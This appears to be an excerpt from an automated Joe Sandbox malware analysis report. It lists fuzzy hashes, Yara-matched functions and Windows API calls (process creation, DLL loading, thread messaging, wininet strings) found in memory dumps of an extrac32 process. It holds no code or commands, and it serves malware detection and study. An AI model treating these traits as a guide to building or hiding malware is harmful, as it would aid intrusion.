                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_50b0000_extrac32.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                  • Opcode ID: 22ec359d5e7f700aafc0bd79727b77df20286c4a270c0602ebd4e4318b9ef567
                                                                                                                                                                                                  • Instruction ID: fad82952f36dce517c354d8e2a3469283581267755c3a05b94616cf2a926ad48
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22ec359d5e7f700aafc0bd79727b77df20286c4a270c0602ebd4e4318b9ef567
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0790022124605152D650725C46556164015A7E0201F91C465B0805594DC66988557231
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16762252801.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_50b0000_extrac32.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                  • Opcode ID: 317790090f4e2d04ee39ff206827096a005aa03438283cbee8d63770d22811d8
                                                                                                                                                                                                  • Instruction ID: 89e189aaabfb65625dc253e7777b073bfd22cdb4562a9ff908195e0c6d24cebe
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 317790090f4e2d04ee39ff206827096a005aa03438283cbee8d63770d22811d8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3890023120200852D6807258465564A001587D1301FD1C459B0016654DCB298A5977B1
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16762252801.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_50b0000_extrac32.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                  • Opcode ID: d3bef92906f616adbe28a3cb87fdbe44a4cdf1a65a9215fdb2439c9d560c0407
                                                                                                                                                                                                  • Instruction ID: 20660468b088b61613c031319799d4b2723d10358afb64a7f8c5b53266de6361
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3bef92906f616adbe28a3cb87fdbe44a4cdf1a65a9215fdb2439c9d560c0407
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0690023120604892D64072584655A46002587D0305F91C455B0055694DD7398D55B671
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16762252801.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_50b0000_extrac32.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                  • Opcode ID: e78a79ef5397705473b62f03b9b8cd3c06b5fb398f0fa8e453641669d72e37d1
                                                                                                                                                                                                  • Instruction ID: 64d5ce41b80879aa1101ce7d60578a9bfb1486a3a60b4c8a735404fba5103394
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e78a79ef5397705473b62f03b9b8cd3c06b5fb398f0fa8e453641669d72e37d1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E190023120208852D6106258865574A001587D0301F95C855B4415658DC7A988917131
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16762252801.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_50b0000_extrac32.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                  • Opcode ID: 36f665baf4e2b7ef35b9ef2a952cf9dfd25f4d96c50f3f3f2ec171a411175957
                                                                                                                                                                                                  • Instruction ID: 74a5686109fd54a18dc6988ffc5e5ff52eb16bb3e78bdecd930599d2ece676f3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36f665baf4e2b7ef35b9ef2a952cf9dfd25f4d96c50f3f3f2ec171a411175957
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F090023120200892D60062584655B46001587E0301F91C45AB0115654DC729C8517531
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16762252801.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_50b0000_extrac32.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                  • Opcode ID: e50ee15dae2cccf9402b5358b5b7f48905791b41551dbd0d99f8944ec3408e65
                                                                                                                                                                                                  • Instruction ID: 0ecd5b08d01e83c7160789b8e59f65793456338f5de1ff8c11847ee7002f83b5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e50ee15dae2cccf9402b5358b5b7f48905791b41551dbd0d99f8944ec3408e65
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0390023120200452D60066985659646001587E0301F91D455B5015555EC77988917131
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16762252801.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_50b0000_extrac32.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                  • Opcode ID: 0bb61936f4b68a9fa50c5b2f114fcbf7a3022c1a673023eeb359f15e95dfc04b
                                                                                                                                                                                                  • Instruction ID: a2b62853e8da1f29b164ffb2908f3d035fa473b6f194bedaafb15108333b8a87
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0bb61936f4b68a9fa50c5b2f114fcbf7a3022c1a673023eeb359f15e95dfc04b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE900225222000520645A658075550B045597D63517D1C459F1407590CC73588656331
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16762252801.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_50b0000_extrac32.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                  • Opcode ID: 74317f03eee12310b72a4fce6a051fc7b3a293abc417ed0f7f1aaa073c17c9b0
                                                                                                                                                                                                  • Instruction ID: 364a89b86e0eeb977ffabd879da73b4b231abca487599b34f0f39a8306f1942f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74317f03eee12310b72a4fce6a051fc7b3a293abc417ed0f7f1aaa073c17c9b0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E90026120300053460572584665616401A87E0201F91C465F1005590DC63988917135
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16762252801.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_50b0000_extrac32.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                  • Opcode ID: 9415eb26b4efcd51afe2258a9e476c0cda1e0476a33bfcdff675d83db054d1b3
                                                                                                                                                                                                  • Instruction ID: 85884105f9d0787430b264dadccc7db21b59681397a0916c0623fda81d7ece5f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9415eb26b4efcd51afe2258a9e476c0cda1e0476a33bfcdff675d83db054d1b3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A390023160600852D65072584665746001587D0301F91C455B0015654DC7698A5576B1
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_30b0000_extrac32.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 54Z8E45$54Z8E45
                                                                                                                                                                                                  • API String ID: 0-3718252788
                                                                                                                                                                                                  • Opcode ID: ced9c32a7746adbee65ba171663ecb209fcb7dd928119382b30760c9970871b2
                                                                                                                                                                                                  • Instruction ID: e2ab5cc97c047cbd2cd09881a4def74d60c168bac0ba5d6abd4dfb5e6ebee3ba
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ced9c32a7746adbee65ba171663ecb209fcb7dd928119382b30760c9970871b2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C51DA768162C8ABDB21CFB8C881ADFBBBCEF81610F58809CE9405B642D321D916C791
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • PostThreadMessageW.USER32(54Z8E45,00000111,00000000,00000000), ref: 030C0557
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_30b0000_extrac32.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                                  • String ID: 54Z8E45$54Z8E45
                                                                                                                                                                                                  • API String ID: 1836367815-3718252788
                                                                                                                                                                                                  • Opcode ID: 17dc889591b6b327b952b79152925b8c0085b8a5123b60ec3d5fbf81d8d04a9a
                                                                                                                                                                                                  • Instruction ID: eed58799a7e8fdf9b6b86ec19a66fc769d41bfa7e03358a828cfdfab86d201c4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17dc889591b6b327b952b79152925b8c0085b8a5123b60ec3d5fbf81d8d04a9a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7901C8B6D4125C7ADB11EBE58C81DEF7BBCDF80694F448068FA14AB100D5798E0647A1
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • PostThreadMessageW.USER32(54Z8E45,00000111,00000000,00000000), ref: 030C0557
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_30b0000_extrac32.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                                  • String ID: 54Z8E45$54Z8E45
                                                                                                                                                                                                  • API String ID: 1836367815-3718252788
                                                                                                                                                                                                  • Opcode ID: c6cda135740f8acf60ba75f46ffedaf80cbdf96bddba689aef00e1d543745e93
                                                                                                                                                                                                  • Instruction ID: ab9f62270cc763eb79431f67f36b86a85f14775639792bf2a7dc3af61393ce5c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6cda135740f8acf60ba75f46ffedaf80cbdf96bddba689aef00e1d543745e93
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE01DBB5D4135C7ADB01DBD58C81DEF7BBCDF80694F448068FA046B100D5789E0647B1
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 030D208B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_30b0000_extrac32.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                                                                                                                  • Opcode ID: 5465a4d5a6672f1c79f0155bd7a89c75f37bc1734b4d7b71396d44187b1dc28c
                                                                                                                                                                                                  • Instruction ID: 3c35ebe7dbf3a2e0d02304699749a3c046e9aa4040748794804409889ed5829d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5465a4d5a6672f1c79f0155bd7a89c75f37bc1734b4d7b71396d44187b1dc28c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3316FB9641704ABD714DFA4D880FABB7E8FF84300F048A6DEA9D5B245D7B1B544CBA0
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 030D208B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_30b0000_extrac32.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                                                                                                                  • Opcode ID: 440a042211e585bb891929db6eeaa485d5a7dda3ad1bef701ab62af26b377e0b
                                                                                                                                                                                                  • Instruction ID: a7dbf0f891747909e8e0acbb2e815d028639107fef2f7de61400e8ead6b852b5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 440a042211e585bb891929db6eeaa485d5a7dda3ad1bef701ab62af26b377e0b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0831B1B4641304ABD714DF64D885FAABBF8FF84304F04C669EA5D6B285D7B06544CBE0
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?), ref: 030C87E6
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_30b0000_extrac32.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                  • API String ID: 3188754299-2766056989
                                                                                                                                                                                                  • Opcode ID: f9c37cfc6f124927dadf04460b9270b4cbeb6dee42413e7a41d2535413b5c1fe
                                                                                                                                                                                                  • Instruction ID: d03cb8c3c2752e03b7dcea378a5df1a095fea182ab21600b96c921cf50b1f848
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9c37cfc6f124927dadf04460b9270b4cbeb6dee42413e7a41d2535413b5c1fe
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 117171B6911308ABDB24DBA4CC84FEFB3BCEF84300F48459DE5199B140EB71A7948B65
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 030CE087
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_30b0000_extrac32.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Initialize
                                                                                                                                                                                                  • String ID: @J7<
                                                                                                                                                                                                  • API String ID: 2538663250-2016760708
                                                                                                                                                                                                  • Opcode ID: 599ced28dd5258fb69753023f50c343136cb46e213b4fcb34addadc916baed1f
                                                                                                                                                                                                  • Instruction ID: b6e823d01bedb711f2218f4cdbcbaf3c6a8ce722250438b7ef5a2ad66d95f175
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 599ced28dd5258fb69753023f50c343136cb46e213b4fcb34addadc916baed1f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD314FB5A0060A9FDB10DFD8CC809EFB3B9FF88304B108559E905AB204D771EE45CBA0
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 030C3D12
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_30b0000_extrac32.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                  • Opcode ID: 899e6cd8e56fbf981581dbbda92ce69254137c2597a48f1214787b44c9f1dc96
                                                                                                                                                                                                  • Instruction ID: 33e3ee88a0fc54183f423f27aa449d07fc906243090c4eeb67e29516735ee410
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 899e6cd8e56fbf981581dbbda92ce69254137c2597a48f1214787b44c9f1dc96
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1015EB9E1130DABDB10EBA0DC41FDEB3B89B44608F048194E9089B240F635EB04CB91
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,030C7123,00000010,?,?,?,00000044,?,00000010,030C7123,?,?,?), ref: 030D511C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_30b0000_extrac32.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateInternalProcess
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2186235152-0
                                                                                                                                                                                                  • Opcode ID: 9b56de59c55e5c0472579d7c0f4ed9649931ea97da5ccb985b86d8ad66916227
                                                                                                                                                                                                  • Instruction ID: e07ed37eb5922407e468e5e804fcad9078439fece3f89e65074cbeafa9353be6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b56de59c55e5c0472579d7c0f4ed9649931ea97da5ccb985b86d8ad66916227
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5201C0B2201208BFCB48DE89DC80EEB77ADAF8C750F408109BA08A7240D630E8518BA4
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 030B98C5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_30b0000_extrac32.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                                                                  • Opcode ID: 8c89501cc04ddf6f16ca7edb0a9b84bba1f3607073a580430f174aa11db25a66
                                                                                                                                                                                                  • Instruction ID: 32790417c493eb8f281dcd976444dd987d92c9870e751ce84a3a3e8fea3617bc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c89501cc04ddf6f16ca7edb0a9b84bba1f3607073a580430f174aa11db25a66
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1F06D7B38130436E660A5AAAC06FDBB79CDFC0B61F140525FB4CEE2C0D992B84146E4
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,7E5C468B,00000007,00000000,00000004,00000000,030C3494,000000F0,?,?,?,?,00000000), ref: 030D506F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_30b0000_extrac32.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                                                  • Opcode ID: ef391e16263f5701c80b556ab00957cc13cc3d19f6a134c4eab17150233a4325
                                                                                                                                                                                                  • Instruction ID: e751b42898bee72aaecccc8fb726a395c933b7f72d0861c015efdbb02185626c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef391e16263f5701c80b556ab00957cc13cc3d19f6a134c4eab17150233a4325
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64F0D475611345AFDB24DE58DC45EEB37E8EBC9750F404419FA09A7241CA31A9118BA4
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,7E5C468B,00000007,00000000,00000004,00000000,030C3494,000000F0,?,?,?,?,00000000), ref: 030D506F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_30b0000_extrac32.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                                                  • Opcode ID: f55597c3135c4d06e8fd7ea1b8e831cea9c66ddbc72bccdd838fb3e381eab820
                                                                                                                                                                                                  • Instruction ID: b00945da7d1402ea374c282d7fb5a99a2b94498e6d0132469c7175ac1cf4d890
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f55597c3135c4d06e8fd7ea1b8e831cea9c66ddbc72bccdd838fb3e381eab820
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8AE09A766003057BDA24EE98DC81FEB33ACEFC9750F404418FA08AB241CB30B8118BB4
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(030C1B23,?,030D30FF,030C1B23,030D30C7,030D30FF,?,030C1B23,030D30C7,00001000,?,?,030D6830), ref: 030D501C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_30b0000_extrac32.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1279760036-0
